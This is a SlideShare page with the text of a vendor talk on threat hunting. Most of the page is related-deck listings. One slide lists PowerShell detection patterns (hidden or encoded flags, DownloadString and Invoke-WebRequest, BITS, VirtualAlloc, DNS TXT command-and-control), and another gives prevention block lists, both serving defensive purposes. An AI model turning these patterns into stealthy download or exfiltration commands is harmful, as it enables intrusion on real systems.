SlideShare una empresa de Scribd logo

Maturing your threat hunting program

Cybereason
Cybereason

A closer look at threat hunting. Beyond the Basics

Tecnología
1 de 16
Descargar para leer sin conexión
Total Endpoint Protection: #1 in EDR & Next-Gen AV Threat Hunting 102: Beyond The Basics, Maturing Your Threat Hunting Program
Total Endpoint Protection: #1 in EDR & Next-Gen AV Who Am I? Jayson Wehrend Senior Sales Engineer, Cybereason Former Tech Consultant, RSA
Total Endpoint Protection: #1 in EDR & Next-Gen AV Why We’re Here Today o Quick hunting refresher o I’m hunting! Now what? o Giving back & process integration o Expanded PowerShell use case
Total Endpoint Protection: #1 in EDR & Next-Gen AV REFRESHER: HUNTING DEFINED. The process of proactively discovering undesirable activity to illicit a positive outcome.
Total Endpoint Protection: #1 in EDR & Next-Gen AV REFRESHER: WHY? Prepare? It’s very hard to defend what you can’t see and don’t understand. Be proactive? Don’t wait for the bad to happen, then have to react to fix. Fix stuff? Especially before it breaks!
Total Endpoint Protection: #1 in EDR & Next-Gen AV Time to Change. Intelligence is the ability to adapt to change. -- Stephen Hawking
Total Endpoint Protection: #1 in EDR & Next-Gen AV The Hunting Process Motivation + Hypothesis Data Collection Tooling / Analysis Outcomes Automation
Total Endpoint Protection: #1 in EDR & Next-Gen AV I’m Hunting! Now What? o We’re Giving Back! – Incidents – Detection improvements / new collection techniques – Prevention with confidence – Improve response / triage – Configuration management / compliance / audit
Total Endpoint Protection: #1 in EDR & Next-Gen AV Incident Response Process Prepare Detect Respond Contain / Eradicate Post- Mortem / Prevent
Total Endpoint Protection: #1 in EDR & Next-Gen AV Prepare Detect Respond Contain / Eradicate Post- Mortem / Prevent Motivation + Hypothesis Data Collection Tooling / Analysis Outcomes Automation* Incident Response Process Hunting Process Use blind spots/gaps as sources of motivation + hypothesis High fidelity detections Escalated incident New data collection & analysis techniques improve triage & response SOPs
Total Endpoint Protection: #1 in EDR & Next-Gen AV Hunting: A Deeper Dive o Previous outcomes create new motivation + hypothesis’ o Introducing new datasets to expand previous outcomes o Data stacking becomes more crucial to the journey to analysis/data science
Total Endpoint Protection: #1 in EDR & Next-Gen AV EXPANDED HUNTING: POWERSHELL
Total Endpoint Protection: #1 in EDR & Next-Gen AV File-less Techniques PowerShell Process Execution Persistence Network Comms Service Registry Hidden Obfuscated Encoded Download Commands Shellcode DLL Execution Parent/child Profiling Int2Ext Profiling DNS Queries Service = commandline:powershell or .ps* Registry = commandline:powershell or .ps* commandLine:hidden|1|-nop|iex|- invoke|ICM|scriptblock, commandLine:`|1|^|+|$|*|&|. commandLine:nop|nonl|nol|bypass|e|enc|ec commandLine:DownloadFile|IWE|Invoke-WebRequest|IRM|Invoke- RestMethod|DownloadString|BITS commandLine:dllimport| virtualalloc Parent:wscript|mshta|M SOffice|Browser|WMI* Connections à Filter:isExternalConnection:True URL: .ps* DNS Query: TXT C2 DNS Query: Received vs. Transmitted Ratios
Total Endpoint Protection: #1 in EDR & Next-Gen AV Giving Back…Incident Escalation o Incident 1: PowerShell Web Client – Downloading Stage 2 Payload o Incident 2: Remote .ps file execution / invoking shellcode o Incident 3: Mismatched Services – Adversarial use of .ps o Incident 4: Data Exfil – Powershell BITSTransfer
Total Endpoint Protection: #1 in EDR & Next-Gen AV Giving Back…Prevention o Block execution of PowerShell.exe on all systems where it’s not in use for administrative purposes o Force specific Parent/Child Process Relationships – MSOffice|Wscript|Mshta|Browsers|WMI spawning Powershell.exe o Anchor PowerShell scripts to a specific server directories, block .ps* from running directly on a system o Use endpoint firewall to prevent PowerShell.exe from connecting to non- approved Ips o Block “Bypass” “Hidden” “Download String” “WebClient” “DLLImport” “VirtualAlloc” as a command line argument for execution by an unauthorized user o See #2 for allowing valid applications
Total Endpoint Protection: #1 in EDR & Next-Gen AV Thank you! Questions? jayson.wehrend@cybereason.com @cybereason

Recomendados

Protecting the healthcare industry
Protecting the healthcare industryProtecting the healthcare industry
Protecting the healthcare industry
Cybereason
 
The attack lifecycle. Cybereason can help you answer: Are you under attack?
The attack lifecycle. Cybereason can help you answer: Are you under attack?The attack lifecycle. Cybereason can help you answer: Are you under attack?
The attack lifecycle. Cybereason can help you answer: Are you under attack?
Cybereason
 
The Cyber Attack Lifecycle
The Cyber Attack LifecycleThe Cyber Attack Lifecycle
The Cyber Attack Lifecycle
Cybereason
 
The Incident Response Checklist - 9 Steps Your Current Plan Lacks
The Incident Response Checklist - 9 Steps Your Current Plan LacksThe Incident Response Checklist - 9 Steps Your Current Plan Lacks
The Incident Response Checklist - 9 Steps Your Current Plan Lacks
Cybereason
 
Protecting the manufacturing industry
Protecting the manufacturing industryProtecting the manufacturing industry
Protecting the manufacturing industry
Cybereason
 
Hunting The Shadows: In Depth Analysis of Escalated APT Attacks
Hunting The Shadows: In Depth Analysis of Escalated APT AttacksHunting The Shadows: In Depth Analysis of Escalated APT Attacks
Hunting The Shadows: In Depth Analysis of Escalated APT Attacks
F _
 
Deception Technology: Use Cases & Implementation Approaches
Deception Technology: Use Cases & Implementation Approaches Deception Technology: Use Cases & Implementation Approaches
Deception Technology: Use Cases & Implementation Approaches
Priyanka Aash
 
Purple team is awesome
Purple team is awesomePurple team is awesome
Purple team is awesome
Sumedt Jitpukdebodin
 

Recomendados

Protecting the healthcare industry
Protecting the healthcare industryProtecting the healthcare industry
Protecting the healthcare industry
Cybereason
 
The attack lifecycle. Cybereason can help you answer: Are you under attack?
The attack lifecycle. Cybereason can help you answer: Are you under attack?The attack lifecycle. Cybereason can help you answer: Are you under attack?
The attack lifecycle. Cybereason can help you answer: Are you under attack?
Cybereason
 
The Cyber Attack Lifecycle
The Cyber Attack LifecycleThe Cyber Attack Lifecycle
The Cyber Attack Lifecycle
Cybereason
 
The Incident Response Checklist - 9 Steps Your Current Plan Lacks
The Incident Response Checklist - 9 Steps Your Current Plan LacksThe Incident Response Checklist - 9 Steps Your Current Plan Lacks
The Incident Response Checklist - 9 Steps Your Current Plan Lacks
Cybereason
 
Protecting the manufacturing industry
Protecting the manufacturing industryProtecting the manufacturing industry
Protecting the manufacturing industry
Cybereason
 
Hunting The Shadows: In Depth Analysis of Escalated APT Attacks
Hunting The Shadows: In Depth Analysis of Escalated APT AttacksHunting The Shadows: In Depth Analysis of Escalated APT Attacks
Hunting The Shadows: In Depth Analysis of Escalated APT Attacks
F _
 
Deception Technology: Use Cases & Implementation Approaches
Deception Technology: Use Cases & Implementation Approaches Deception Technology: Use Cases & Implementation Approaches
Deception Technology: Use Cases & Implementation Approaches
Priyanka Aash
 
Purple team is awesome
Purple team is awesomePurple team is awesome
Purple team is awesome
Sumedt Jitpukdebodin
 
2018 CISSP Mentor Program- Session 6
2018 CISSP Mentor Program- Session 62018 CISSP Mentor Program- Session 6
2018 CISSP Mentor Program- Session 6
FRSecure
 
Birds of a Feather 2017: 邀請分享 Glance into the Enterprise InfoSec Field - Howard
Birds of a Feather 2017: 邀請分享 Glance into the Enterprise InfoSec Field - HowardBirds of a Feather 2017: 邀請分享 Glance into the Enterprise InfoSec Field - Howard
Birds of a Feather 2017: 邀請分享 Glance into the Enterprise InfoSec Field - Howard
HITCON GIRLS
 
2018 CISSP Mentor Program Session 3
2018 CISSP Mentor Program Session 32018 CISSP Mentor Program Session 3
2018 CISSP Mentor Program Session 3
FRSecure
 
Birds of a Feather 2017: 邀請分享 Place of Attribution in Threat Intelligence - F...
Birds of a Feather 2017: 邀請分享 Place of Attribution in Threat Intelligence - F...Birds of a Feather 2017: 邀請分享 Place of Attribution in Threat Intelligence - F...
Birds of a Feather 2017: 邀請分享 Place of Attribution in Threat Intelligence - F...
HITCON GIRLS
 
FRSecure 2018 CISSP Mentor Program Session 10
FRSecure 2018 CISSP Mentor Program Session 10FRSecure 2018 CISSP Mentor Program Session 10
FRSecure 2018 CISSP Mentor Program Session 10
FRSecure
 
Worst-Case Scenario: Being Detected without Knowing You are Detected
Worst-Case Scenario: Being Detected without Knowing You are DetectedWorst-Case Scenario: Being Detected without Knowing You are Detected
Worst-Case Scenario: Being Detected without Knowing You are Detected
Ashwini Almad
 
Slide Deck – Session 5 – FRSecure CISSP Mentor Program 2017
Slide Deck – Session 5 – FRSecure CISSP Mentor Program 2017Slide Deck – Session 5 – FRSecure CISSP Mentor Program 2017
Slide Deck – Session 5 – FRSecure CISSP Mentor Program 2017
FRSecure
 
Seeing Purple: Hybrid Security Teams for the Enterprise - BSides Jackson 2013
Seeing Purple: Hybrid Security Teams for the Enterprise - BSides Jackson 2013Seeing Purple: Hybrid Security Teams for the Enterprise - BSides Jackson 2013
Seeing Purple: Hybrid Security Teams for the Enterprise - BSides Jackson 2013
beltface
 
The Inmates Are Running the Asylum: Why Some Multi-Factor Authentication Tech...
The Inmates Are Running the Asylum: Why Some Multi-Factor Authentication Tech...The Inmates Are Running the Asylum: Why Some Multi-Factor Authentication Tech...
The Inmates Are Running the Asylum: Why Some Multi-Factor Authentication Tech...
Clare Nelson, CISSP, CIPP-E
 
MITRE ATT&CKcon 2018: From Red VS Blue to Red ♥ Blue, Olaf Hartong and Vincen...
MITRE ATT&CKcon 2018: From Red VS Blue to Red ♥ Blue, Olaf Hartong and Vincen...MITRE ATT&CKcon 2018: From Red VS Blue to Red ♥ Blue, Olaf Hartong and Vincen...
MITRE ATT&CKcon 2018: From Red VS Blue to Red ♥ Blue, Olaf Hartong and Vincen...
MITRE - ATT&CKcon
 
Slide Deck – Session 12 – FRSecure CISSP Mentor Program 2017
Slide Deck – Session 12 – FRSecure CISSP Mentor Program 2017Slide Deck – Session 12 – FRSecure CISSP Mentor Program 2017
Slide Deck – Session 12 – FRSecure CISSP Mentor Program 2017
FRSecure
 
Vulnerability Assessment, Physical Security, and Nuclear Safeguards
Vulnerability Assessment, Physical Security, and Nuclear SafeguardsVulnerability Assessment, Physical Security, and Nuclear Safeguards
Vulnerability Assessment, Physical Security, and Nuclear Safeguards
Roger Johnston
 
2018 FRSecure CISSP Mentor Program Session 8
2018 FRSecure CISSP Mentor Program Session 82018 FRSecure CISSP Mentor Program Session 8
2018 FRSecure CISSP Mentor Program Session 8
FRSecure
 
Extracting the Malware Signal from Internet Noise
Extracting the Malware Signal from Internet NoiseExtracting the Malware Signal from Internet Noise
Extracting the Malware Signal from Internet Noise
Ashwini Almad
 
Sp Security 101 Primer 2 1
Sp Security 101 Primer 2 1Sp Security 101 Primer 2 1
Sp Security 101 Primer 2 1
Barry Greene
 
2019 FRSecure CISSP Mentor Program: Class Nine
2019 FRSecure CISSP Mentor Program: Class Nine2019 FRSecure CISSP Mentor Program: Class Nine
2019 FRSecure CISSP Mentor Program: Class Nine
FRSecure
 
2019 FRecure CISSP Mentor Program: Session Two
2019 FRecure CISSP Mentor Program: Session Two2019 FRecure CISSP Mentor Program: Session Two
2019 FRecure CISSP Mentor Program: Session Two
FRSecure
 
Advanced persistent threat (apt)
Advanced persistent threat (apt)Advanced persistent threat (apt)
Advanced persistent threat (apt)
mmubashirkhan
 
MITRE ATT&CKcon 2018: From Automation to Analytics: Simulating the Adversary ...
MITRE ATT&CKcon 2018: From Automation to Analytics: Simulating the Adversary ...MITRE ATT&CKcon 2018: From Automation to Analytics: Simulating the Adversary ...
MITRE ATT&CKcon 2018: From Automation to Analytics: Simulating the Adversary ...
MITRE - ATT&CKcon
 
Pen Testing Explained
Pen Testing ExplainedPen Testing Explained
Pen Testing Explained
Rand W. Hirt
 
The Best Just Got Better, Intercept X Now With EDR
The Best Just Got Better, Intercept X Now With EDRThe Best Just Got Better, Intercept X Now With EDR
The Best Just Got Better, Intercept X Now With EDR
Netpluz Asia Pte Ltd
 
Threat Hunting 102: Beyond the Basics
Threat Hunting 102: Beyond the BasicsThreat Hunting 102: Beyond the Basics
Threat Hunting 102: Beyond the Basics
Cybereason
 

Más contenido relacionado

La actualidad más candente

Seeing Purple: Hybrid Security Teams for the Enterprise - BSides Jackson 2013
Seeing Purple: Hybrid Security Teams for the Enterprise - BSides Jackson 2013Seeing Purple: Hybrid Security Teams for the Enterprise - BSides Jackson 2013
Seeing Purple: Hybrid Security Teams for the Enterprise - BSides Jackson 2013
beltface
 
The Inmates Are Running the Asylum: Why Some Multi-Factor Authentication Tech...
The Inmates Are Running the Asylum: Why Some Multi-Factor Authentication Tech...The Inmates Are Running the Asylum: Why Some Multi-Factor Authentication Tech...
The Inmates Are Running the Asylum: Why Some Multi-Factor Authentication Tech...
Clare Nelson, CISSP, CIPP-E
 
MITRE ATT&CKcon 2018: From Red VS Blue to Red ♥ Blue, Olaf Hartong and Vincen...
MITRE ATT&CKcon 2018: From Red VS Blue to Red ♥ Blue, Olaf Hartong and Vincen...MITRE ATT&CKcon 2018: From Red VS Blue to Red ♥ Blue, Olaf Hartong and Vincen...
MITRE ATT&CKcon 2018: From Red VS Blue to Red ♥ Blue, Olaf Hartong and Vincen...
MITRE - ATT&CKcon
 
Advanced persistent threat (apt)
Advanced persistent threat (apt)Advanced persistent threat (apt)
Advanced persistent threat (apt)
mmubashirkhan
 
MITRE ATT&CKcon 2018: From Automation to Analytics: Simulating the Adversary ...
MITRE ATT&CKcon 2018: From Automation to Analytics: Simulating the Adversary ...MITRE ATT&CKcon 2018: From Automation to Analytics: Simulating the Adversary ...
MITRE ATT&CKcon 2018: From Automation to Analytics: Simulating the Adversary ...
MITRE - ATT&CKcon
 
Pen Testing Explained
Pen Testing ExplainedPen Testing Explained
Pen Testing Explained
Rand W. Hirt
 

La actualidad más candente (20)

2018 CISSP Mentor Program- Session 6
2018 CISSP Mentor Program- Session 62018 CISSP Mentor Program- Session 6
2018 CISSP Mentor Program- Session 6
 
Birds of a Feather 2017: 邀請分享 Glance into the Enterprise InfoSec Field - Howard
Birds of a Feather 2017: 邀請分享 Glance into the Enterprise InfoSec Field - HowardBirds of a Feather 2017: 邀請分享 Glance into the Enterprise InfoSec Field - Howard
Birds of a Feather 2017: 邀請分享 Glance into the Enterprise InfoSec Field - Howard
 
2018 CISSP Mentor Program Session 3
2018 CISSP Mentor Program Session 32018 CISSP Mentor Program Session 3
2018 CISSP Mentor Program Session 3
 
Birds of a Feather 2017: 邀請分享 Place of Attribution in Threat Intelligence - F...
Birds of a Feather 2017: 邀請分享 Place of Attribution in Threat Intelligence - F...Birds of a Feather 2017: 邀請分享 Place of Attribution in Threat Intelligence - F...
Birds of a Feather 2017: 邀請分享 Place of Attribution in Threat Intelligence - F...
 
FRSecure 2018 CISSP Mentor Program Session 10
FRSecure 2018 CISSP Mentor Program Session 10FRSecure 2018 CISSP Mentor Program Session 10
FRSecure 2018 CISSP Mentor Program Session 10
 
Worst-Case Scenario: Being Detected without Knowing You are Detected
Worst-Case Scenario: Being Detected without Knowing You are DetectedWorst-Case Scenario: Being Detected without Knowing You are Detected
Worst-Case Scenario: Being Detected without Knowing You are Detected
 
Slide Deck – Session 5 – FRSecure CISSP Mentor Program 2017
Slide Deck – Session 5 – FRSecure CISSP Mentor Program 2017Slide Deck – Session 5 – FRSecure CISSP Mentor Program 2017
Slide Deck – Session 5 – FRSecure CISSP Mentor Program 2017
 
Seeing Purple: Hybrid Security Teams for the Enterprise - BSides Jackson 2013
Seeing Purple: Hybrid Security Teams for the Enterprise - BSides Jackson 2013Seeing Purple: Hybrid Security Teams for the Enterprise - BSides Jackson 2013
Seeing Purple: Hybrid Security Teams for the Enterprise - BSides Jackson 2013
 
The Inmates Are Running the Asylum: Why Some Multi-Factor Authentication Tech...
The Inmates Are Running the Asylum: Why Some Multi-Factor Authentication Tech...The Inmates Are Running the Asylum: Why Some Multi-Factor Authentication Tech...
The Inmates Are Running the Asylum: Why Some Multi-Factor Authentication Tech...
 
MITRE ATT&CKcon 2018: From Red VS Blue to Red ♥ Blue, Olaf Hartong and Vincen...
MITRE ATT&CKcon 2018: From Red VS Blue to Red ♥ Blue, Olaf Hartong and Vincen...MITRE ATT&CKcon 2018: From Red VS Blue to Red ♥ Blue, Olaf Hartong and Vincen...
MITRE ATT&CKcon 2018: From Red VS Blue to Red ♥ Blue, Olaf Hartong and Vincen...
 
Slide Deck – Session 12 – FRSecure CISSP Mentor Program 2017
Slide Deck – Session 12 – FRSecure CISSP Mentor Program 2017Slide Deck – Session 12 – FRSecure CISSP Mentor Program 2017
Slide Deck – Session 12 – FRSecure CISSP Mentor Program 2017
 
Vulnerability Assessment, Physical Security, and Nuclear Safeguards
Vulnerability Assessment, Physical Security, and Nuclear SafeguardsVulnerability Assessment, Physical Security, and Nuclear Safeguards
Vulnerability Assessment, Physical Security, and Nuclear Safeguards
 
2018 FRSecure CISSP Mentor Program Session 8
2018 FRSecure CISSP Mentor Program Session 82018 FRSecure CISSP Mentor Program Session 8
2018 FRSecure CISSP Mentor Program Session 8
 
Extracting the Malware Signal from Internet Noise
Extracting the Malware Signal from Internet NoiseExtracting the Malware Signal from Internet Noise
Extracting the Malware Signal from Internet Noise
 
Sp Security 101 Primer 2 1
Sp Security 101 Primer 2 1Sp Security 101 Primer 2 1
Sp Security 101 Primer 2 1
 
2019 FRSecure CISSP Mentor Program: Class Nine
2019 FRSecure CISSP Mentor Program: Class Nine2019 FRSecure CISSP Mentor Program: Class Nine
2019 FRSecure CISSP Mentor Program: Class Nine
 
2019 FRecure CISSP Mentor Program: Session Two
2019 FRecure CISSP Mentor Program: Session Two2019 FRecure CISSP Mentor Program: Session Two
2019 FRecure CISSP Mentor Program: Session Two
 
Advanced persistent threat (apt)
Advanced persistent threat (apt)Advanced persistent threat (apt)
Advanced persistent threat (apt)
 
MITRE ATT&CKcon 2018: From Automation to Analytics: Simulating the Adversary ...
MITRE ATT&CKcon 2018: From Automation to Analytics: Simulating the Adversary ...MITRE ATT&CKcon 2018: From Automation to Analytics: Simulating the Adversary ...
MITRE ATT&CKcon 2018: From Automation to Analytics: Simulating the Adversary ...
 
Pen Testing Explained
Pen Testing ExplainedPen Testing Explained
Pen Testing Explained
 

Similar a Maturing your threat hunting program

Fidelis Endpoint® - Live Demonstration
Fidelis Endpoint® - Live Demonstration Fidelis Endpoint® - Live Demonstration
Fidelis Endpoint® - Live Demonstration
Fidelis Cybersecurity
 
Ask me anything: A Conversational Interface to Augment Information Security w...
Ask me anything: A Conversational Interface to Augment Information Security w...Ask me anything: A Conversational Interface to Augment Information Security w...
Ask me anything: A Conversational Interface to Augment Information Security w...
Matthew Park
 
Protecting endpoints from targeted attacks
Protecting endpoints from targeted attacksProtecting endpoints from targeted attacks
Protecting endpoints from targeted attacks
AppSense
 
AllTheTalks Security Chaos Engineering
AllTheTalks Security Chaos Engineering AllTheTalks Security Chaos Engineering
AllTheTalks Security Chaos Engineering
Aaron Rinehart
 
DevOps or DevSecOps
DevOps or DevSecOpsDevOps or DevSecOps
DevOps or DevSecOps
Michelangelo van Dam
 
451 and Endgame - Zero breach Tolerance: Earliest protection across the attac...
451 and Endgame - Zero breach Tolerance: Earliest protection across the attac...451 and Endgame - Zero breach Tolerance: Earliest protection across the attac...
451 and Endgame - Zero breach Tolerance: Earliest protection across the attac...
Adrian Sanabria
 

Similar a Maturing your threat hunting program (20)

The Best Just Got Better, Intercept X Now With EDR
The Best Just Got Better, Intercept X Now With EDRThe Best Just Got Better, Intercept X Now With EDR
The Best Just Got Better, Intercept X Now With EDR
 
Threat Hunting 102: Beyond the Basics
Threat Hunting 102: Beyond the BasicsThreat Hunting 102: Beyond the Basics
Threat Hunting 102: Beyond the Basics
 
Next Generation War: EDR vs RED TEAM
Next Generation War: EDR vs RED TEAMNext Generation War: EDR vs RED TEAM
Next Generation War: EDR vs RED TEAM
 
Fidelis Endpoint® - Live Demonstration
Fidelis Endpoint® - Live Demonstration Fidelis Endpoint® - Live Demonstration
Fidelis Endpoint® - Live Demonstration
 
How to not fail at security data analytics (by CxOSidekick)
How to not fail at security data analytics (by CxOSidekick)How to not fail at security data analytics (by CxOSidekick)
How to not fail at security data analytics (by CxOSidekick)
 
Foundations_Optimum_Security_Overview_AP_Marketing_EN_GLB.pptx
Foundations_Optimum_Security_Overview_AP_Marketing_EN_GLB.pptxFoundations_Optimum_Security_Overview_AP_Marketing_EN_GLB.pptx
Foundations_Optimum_Security_Overview_AP_Marketing_EN_GLB.pptx
 
Endpoint Protection Comparison.pdf
Endpoint Protection Comparison.pdfEndpoint Protection Comparison.pdf
Endpoint Protection Comparison.pdf
 
Three Considerations To Amplify Your Detection and Response Program
Three Considerations To Amplify Your Detection and Response ProgramThree Considerations To Amplify Your Detection and Response Program
Three Considerations To Amplify Your Detection and Response Program
 
Ask me anything: A Conversational Interface to Augment Information Security w...
Ask me anything: A Conversational Interface to Augment Information Security w...Ask me anything: A Conversational Interface to Augment Information Security w...
Ask me anything: A Conversational Interface to Augment Information Security w...
 
Protecting endpoints from targeted attacks
Protecting endpoints from targeted attacksProtecting endpoints from targeted attacks
Protecting endpoints from targeted attacks
 
AllTheTalks Security Chaos Engineering
AllTheTalks Security Chaos Engineering AllTheTalks Security Chaos Engineering
AllTheTalks Security Chaos Engineering
 
DevOps or DevSecOps
DevOps or DevSecOpsDevOps or DevSecOps
DevOps or DevSecOps
 
Filar seymour oreilly_bot_story_
Filar seymour oreilly_bot_story_Filar seymour oreilly_bot_story_
Filar seymour oreilly_bot_story_
 
Offensive malware usage and defense
Offensive malware usage and defenseOffensive malware usage and defense
Offensive malware usage and defense
 
Laura Bell (SafeStack)
Laura Bell (SafeStack)Laura Bell (SafeStack)
Laura Bell (SafeStack)
 
451 and Endgame - Zero breach Tolerance: Earliest protection across the attac...
451 and Endgame - Zero breach Tolerance: Earliest protection across the attac...451 and Endgame - Zero breach Tolerance: Earliest protection across the attac...
451 and Endgame - Zero breach Tolerance: Earliest protection across the attac...
 
Cyber Attack Lifecycle
Cyber Attack LifecycleCyber Attack Lifecycle
Cyber Attack Lifecycle
 
12 Crucial Windows Security Skills for 2017
12 Crucial Windows Security Skills for 201712 Crucial Windows Security Skills for 2017
12 Crucial Windows Security Skills for 2017
 
Increasing DevSecOps Maturity Level in 2021
Increasing DevSecOps Maturity Level in 2021Increasing DevSecOps Maturity Level in 2021
Increasing DevSecOps Maturity Level in 2021
 
New Horizons SCYBER Presentation
New Horizons SCYBER PresentationNew Horizons SCYBER Presentation
New Horizons SCYBER Presentation
 

Más de Cybereason

Más de Cybereason (7)

Antifragile Cyber Defense
Antifragile Cyber DefenseAntifragile Cyber Defense
Antifragile Cyber Defense
 
An Introduction to the Agile SoC
An Introduction to the Agile SoCAn Introduction to the Agile SoC
An Introduction to the Agile SoC
 
Protecting the financial services industry
Protecting the financial services industryProtecting the financial services industry
Protecting the financial services industry
 
Security Analytics: The Promise of Artificial Intelligence, Machine Learning,...
Security Analytics: The Promise of Artificial Intelligence, Machine Learning,...Security Analytics: The Promise of Artificial Intelligence, Machine Learning,...
Security Analytics: The Promise of Artificial Intelligence, Machine Learning,...
 
Avoiding Sophisticated Targeted Breach Critical Guidance Healthcare
Avoiding Sophisticated Targeted Breach Critical Guidance HealthcareAvoiding Sophisticated Targeted Breach Critical Guidance Healthcare
Avoiding Sophisticated Targeted Breach Critical Guidance Healthcare
 
Some PowerShell Goodies
Some PowerShell GoodiesSome PowerShell Goodies
Some PowerShell Goodies
 
Ransomware is Coming to a Desktop Near You
Ransomware is Coming to a Desktop Near YouRansomware is Coming to a Desktop Near You
Ransomware is Coming to a Desktop Near You
 

Último

TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Drew Madelung
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and Myths
Joaquim Jorge
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
Safe Software
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slide
vu2urc
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc
 
Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...
Enterprise Knowledge
 
A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?
Igalia
 

Último (20)

2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...
 
Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)
 
Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...
 
presentation ICT roal in 21st century education
presentation ICT roal in 21st century educationpresentation ICT roal in 21st century education
presentation ICT roal in 21st century education
 
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)
 
🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
 
Advantages of Hiring UIUX Design Service Providers for Your Business
Advantages of Hiring UIUX Design Service Providers for Your BusinessAdvantages of Hiring UIUX Design Service Providers for Your Business
Advantages of Hiring UIUX Design Service Providers for Your Business
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and Myths
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdf
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slide
 
Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024
 
Developing An App To Navigate The Roads of Brazil
Developing An App To Navigate The Roads of BrazilDeveloping An App To Navigate The Roads of Brazil
Developing An App To Navigate The Roads of Brazil
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
 
Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...
 
A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?
 

Maturing your threat hunting program

  • 1. Total Endpoint Protection: #1 in EDR & Next-Gen AV Threat Hunting 102: Beyond The Basics, Maturing Your Threat Hunting Program
  • 2. Total Endpoint Protection: #1 in EDR & Next-Gen AV Who Am I? Jayson Wehrend Senior Sales Engineer, Cybereason Former Tech Consultant, RSA
  • 3. Total Endpoint Protection: #1 in EDR & Next-Gen AV Why We’re Here Today o Quick hunting refresher o I’m hunting! Now what? o Giving back & process integration o Expanded PowerShell use case
  • 4. Total Endpoint Protection: #1 in EDR & Next-Gen AV REFRESHER: HUNTING DEFINED. The process of proactively discovering undesirable activity to illicit a positive outcome.
